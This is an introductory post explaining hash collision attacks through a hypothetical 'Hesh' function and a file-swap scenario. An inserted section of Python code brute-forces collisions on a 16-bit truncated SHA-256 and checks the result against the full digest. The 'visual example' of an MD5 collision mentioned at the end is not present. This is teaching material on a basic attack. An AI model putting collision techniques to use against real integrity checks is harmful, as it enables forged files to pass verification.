Hash Collision Attack
In cryptography, a collision attack on a cryptographic hash
tries to find two inputs producing the same hash value, i.e. a hash collision.
A collision attack is an attempt to find two input strings
that produce the same result under a hash function. Because hash functions
accept inputs of arbitrary length but have a predefined output length, there
will inevitably be different inputs that produce the same output hash. If two
separate inputs produce the same hash output, it is called a collision. A
collision can be exploited against any application that compares two hashes,
such as password hashes, file integrity checks, etc.
For example, let’s say we have a hypothetical hash function
called “Hesh”. A collision attack would start by taking an input value
and hashing it.
Hesh(hello) = 89232323
Now the attacker needs to find a collision: a different
input that generates the same hash as the previous input. This would generally
be done through a brute-force method, trying possible combinations until a
match is found. Let’s say we found a collision for this input in our
hypothetical hash function.
Hesh(asdfghjklzxcvbnmqwertyuiop) = 89232323
The attacker now knows two inputs with the same resulting
hash. As an example of a practical use of this: if the attacker was offering
a file download and showed the hash to prove the file’s integrity, he could
swap the correct file for the colliding one and the hash would remain the same.
The substituted file would appear valid because it has the same hash as the
supposed real file, so the swap would not be obvious to the file validator.
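The search described above, as an added example that is not part of the original post: a toy "Hesh" (assumed here to be SHA-256 truncated to 16 bits so the search finishes quickly) is searched both ways, once with the input "hello" fixed and once as a birthday search where both inputs are free. The function names and input strings are constructed for illustration, and the last function shows that comparing full SHA-256 digests tells the colliding inputs apart.

```python
import hashlib
from itertools import count

BITS = 16  # toy digest size (assumption); real digests are 256 bits or more


def hesh(data: bytes, bits: int = BITS) -> int:
    """Toy 'Hesh': the top `bits` bits of SHA-256 (constructed for this example)."""
    digest = hashlib.sha256(data).digest()
    return int.from_bytes(digest, "big") >> (256 - bits)


def find_second_input(target: bytes, bits: int = BITS):
    """Fixed first input, as in Hesh(hello): expect about 2**bits tries."""
    want = hesh(target, bits)
    for tries in count(1):
        msg = b"candidate-%d" % tries
        if msg != target and hesh(msg, bits) == want:
            return msg, tries


def find_collision(bits: int = BITS):
    """Both inputs free (birthday search): expect about 2**(bits/2) tries."""
    seen = {}  # digest -> first input that produced it
    for tries in count(1):
        msg = b"input-%d" % tries
        h = hesh(msg, bits)
        if h in seen:
            return seen[h], msg, tries
        seen[h] = msg


def same_content(a: bytes, b: bytes) -> bool:
    """Integrity check on the full SHA-256 digest, which is not fooled."""
    return hashlib.sha256(a).digest() == hashlib.sha256(b).digest()


if __name__ == "__main__":
    other, n1 = find_second_input(b"hello")
    print(f"Hesh(hello) == Hesh({other.decode()}) after {n1} tries")
    a, b, n2 = find_collision()
    print(f"Hesh({a.decode()}) == Hesh({b.decode()}) after {n2} tries")
    print("full SHA-256 says same file:", same_content(a, b))
```

Each extra bit of digest doubles the expected work of the fixed-input search, while the birthday search only needs about the square root of that, which is why digest length matters so much for integrity checks.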
So, are hash collisions realistically feasible? Yes,
depending on the hash function. MD5 and even SHA-1 have been shown to not be
very collision resistant; however, SHA-256 and above seem to be safe at the
current time. Here’s a visual example of what a collision attack might entail
on an MD5 hash. Can you figure out what this MD5’s input was?